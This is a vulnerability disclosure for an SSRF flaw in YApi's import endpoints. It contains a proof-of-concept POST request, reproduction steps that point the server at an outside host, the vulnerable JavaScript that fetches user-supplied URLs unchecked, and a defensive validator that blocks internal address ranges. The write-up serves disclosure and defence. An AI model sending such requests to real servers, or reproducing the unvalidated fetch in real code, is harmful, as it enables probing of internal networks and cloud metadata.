YApi: SSRF (Server-Side Request Forgery)
Vulnerability Overview
| Item | Details |
|---|---|
| Vulnerability Type | SSRF (Server-Side Request Forgery) |
| Affected Endpoint | /api/open/import_data |
| HTTP Method | POST |
| Vulnerable Parameter | url |
| Risk Level | High |
| Affected Scope | The latest version is affected |
Proof of Concept (PoC):

```http
POST /api/open/import_data HTTP/2
Host: target
Cookie: your_yapi_token
Content-Type: application/json

{"type": "swagger", "url": "http(s)://example.com","token": "<valid_project_token>","project_id": "<target_project_id>"}
```

Vulnerable Code
Entry point (open import): /api/open/import_data receives the url parameter, and the server fetches the remote resource directly and parses it as JSON.

```javascript
if (!content && !ctx.params.url) {
  return (ctx.body = yapi.commons.resReturn(null, 40022, 'json 或者 url 参数,不能都为空'));
}
...
// url is taken from the request as-is and fetched server-side with no
// scheme, host or address check
if (ctx.params.url) {
  content = await syncGet(ctx.params.url);
} else if (content.indexOf('http://') === 0 || content.indexOf('https://') === 0) {
  // a JSON body that is itself an http(s) URL is fetched the same way
  content = await syncGet(content);
}
content = JSON.parse(content);
```

The swaggerUrl handler passes the query-string url to axios the same way:

```javascript
async swaggerUrl(ctx) {
  const { url } = ctx.request.query;
  const { data } = await axios.get(url); // no validation of url before the server-side fetch
  if (data == null || typeof data !== 'object') {
    throw new Error('返回数据格式不是 JSON');
  }
  ctx.body = yapi.commons.resReturn(data);
}
```
Reproduction Steps
1. First, log in and create a project.
2. After creating it, open the project.
3. Inspect the request packet; from it you can extract the project_id and its corresponding token.
4. Take the project_id and its corresponding token, then use the PoC to verify the SSRF by sending a request to my personal VPS.
```http
POST /api/open/import_data HTTP/2
Host: target
Cookie: your_yapi_token
Content-Type: application/json

{"type": "swagger", "url": "http://{IP:port}","token": "{token}","project_id": "{project_id}"}
```
Then attempt a DNS log request.
Requesting a non-existent address returns the message getaddrinfo ENOTFOUND.
This demonstrates that an SSRF exists at this location.
Remediation Recommendations
Disable the registration feature and place the system inside the internal network.
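A defender's counterpart to the unchecked `syncGet(ctx.params.url)` above, added here as an example and not code from YApi: a validator an import endpoint would run on a user-supplied URL before fetching it. The function names and the range rules are my own; it only judges the URL as written, so the caller must still resolve the hostname and re-check every resolved address and every redirect hop with the same rules.

```javascript
// Added example (not YApi's code): validate a user-supplied import URL before
// the server fetches it. Helper names are assumed; the caller must still
// resolve the hostname and re-check each resolved address and redirect hop.

// Parse a dotted-quad IPv4 literal into four octets, or return null.
function parseIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const octets = m.slice(1).map(Number);
  return octets.every((o) => o <= 255) ? octets : null;
}

// Unwrap an IPv4-mapped IPv6 literal (::ffff:a.b.c.d or ::ffff:xxxx:xxxx).
function mappedIPv4(host) {
  if (!host.startsWith('::ffff:')) return null;
  const rest = host.slice(7);
  if (rest.includes('.')) return parseIPv4(rest);
  const m = /^([0-9a-f]{1,4}):([0-9a-f]{1,4})$/.exec(rest);
  if (!m) return null;
  const hi = parseInt(m[1], 16), lo = parseInt(m[2], 16);
  return [hi >> 8, hi & 255, lo >> 8, lo & 255];
}

// True for destinations a server-side fetch must never reach for a user:
// loopback, RFC 1918, link-local (incl. cloud metadata 169.254.169.254),
// CGNAT, 0.0.0.0/8, and IPv6 loopback / unique-local / link-local.
function isInternalAddress(hostname) {
  const h = hostname.replace(/^\[|\]$/g, '').toLowerCase(); // strip [ ] of IPv6
  if (h === 'localhost' || h.endsWith('.localhost')) return true;
  const v4 = parseIPv4(h) || mappedIPv4(h);
  if (v4) {
    const [a, b] = v4;
    return a === 0 || a === 10 || a === 127 ||
      (a === 100 && b >= 64 && b <= 127) || (a === 169 && b === 254) ||
      (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
  }
  if (h.includes(':')) return h === '::' || h === '::1' || /^f[cd]/.test(h) || /^fe[89ab]/.test(h);
  return false; // plain hostname: resolve it and re-check the addresses
}

// Decide whether the import endpoint may fetch this URL on the user's behalf.
// new URL() normalises IPv4 shorthand such as 127.1, 0x7f000001 or 2130706433.
function isSafeImportUrl(input) {
  let u;
  try { u = new URL(input); } catch { return false; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return false;
  if (u.username || u.password) return false; // no embedded credentials
  return !isInternalAddress(u.hostname);
}
```

axios follows redirects by default, so the fetch should either run with maxRedirects: 0 or re-validate each hop; the branch that fetches a JSON body which is itself an http(s) URL needs the same check.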